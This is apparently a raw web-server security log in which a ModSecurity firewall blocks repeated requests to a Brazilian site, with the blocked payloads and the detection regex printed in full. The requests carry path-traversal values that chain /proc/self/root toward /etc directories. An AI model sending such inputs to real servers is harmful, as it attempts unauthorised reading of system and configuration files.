https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:06:28.924667 2026] [:error] [pid 10651:tid 140411691570944] [client 74.7.243.203:46714] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAVLysWC90G-1nBrA1rgAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:06:30.079530 2026] [:error] [pid 32654:tid 140411716749056] [client 74.7.241.46:60806] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAVglT9VtDQc7bgUycqAAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:06:31.340411 2026] [:error] [pid 10651:tid 140411666392832] [client 74.7.241.46:57626] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAV7ysWC90G-1nBrA1sgAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:06:32.768103 2026] [:error] [pid 10709:tid 140411666392832] [client 74.7.241.46:57640] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAWBXjF1vJNtV6CWrqIgAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:06:34.015313 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.241.46:57648] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAWpqj1wV0Si-OkefaHwAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:06:35.199102 2026] [:error] [pid 32654:tid 140411565680384] [client 74.7.241.46:57656] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAWwlT9VtDQc7bgUycqQAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:06:55.614115 2026] [:error] [pid 10651:tid 140411716749056] [client 74.7.241.46:57662] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAb7ysWC90G-1nBrA10gAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:06:56.723137 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.243.203:38704] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAcLysWC90G-1nBrA10wAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:06:56.914964 2026] [:error] [pid 10772:tid 140411582465792] [client 74.7.241.46:40454] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAcP9ocpUE4ed4uDzeTAAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:06:59.172273 2026] [:error] [pid 21946:tid 140411733534464] [client 74.7.241.46:35416] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAc3bQATo66fKoS7w-agAAAME"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:02.280221 2026] [:error] [pid 32654:tid 140411699963648] [client 74.7.243.203:50476] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAdglT9VtDQc7bgUyctQAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:07:03.561634 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.243.203:48548] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAd7ABkC4fWIHEf8HbYwAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:05.999699 2026] [:error] [pid 10651:tid 140411616036608] [client 74.7.241.46:35418] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAebysWC90G-1nBrA11AAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:07.165778 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.241.46:35428] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAe9SswJuvopo3lOhRBgAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:10.192394 2026] [:error] [pid 21806:tid 140411741927168] [client 74.7.241.46:59900] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAftSswJuvopo3lOhRCAAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:11.471581 2026] [:error] [pid 10709:tid 140411699963648] [client 74.7.241.46:59912] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAfxXjF1vJNtV6CWrqJwAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:12.828081 2026] [:error] [pid 11972:tid 140411565680384] [client 74.7.241.46:59920] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAgJqj1wV0Si-OkefaJQAAABU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:15.951699 2026] [:error] [pid 21946:tid 140411741927168] [client 74.7.243.203:48560] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAg3bQATo66fKoS7w-dAAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:20.455474 2026] [:error] [pid 10651:tid 140411666392832] [client 74.7.241.46:59926] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAiLysWC90G-1nBrA12wAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:25.931354 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.241.46:56020] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAjdSswJuvopo3lOhRDwAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:28.033506 2026] [:error] [pid 32654:tid 140411607643904] [client 74.7.241.46:56026] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAjwlT9VtDQc7bgUycvQAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:07:29.490973 2026] [:error] [pid 11972:tid 140411616036608] [client 74.7.241.46:41904] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgAkZqj1wV0Si-OkefaJwAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
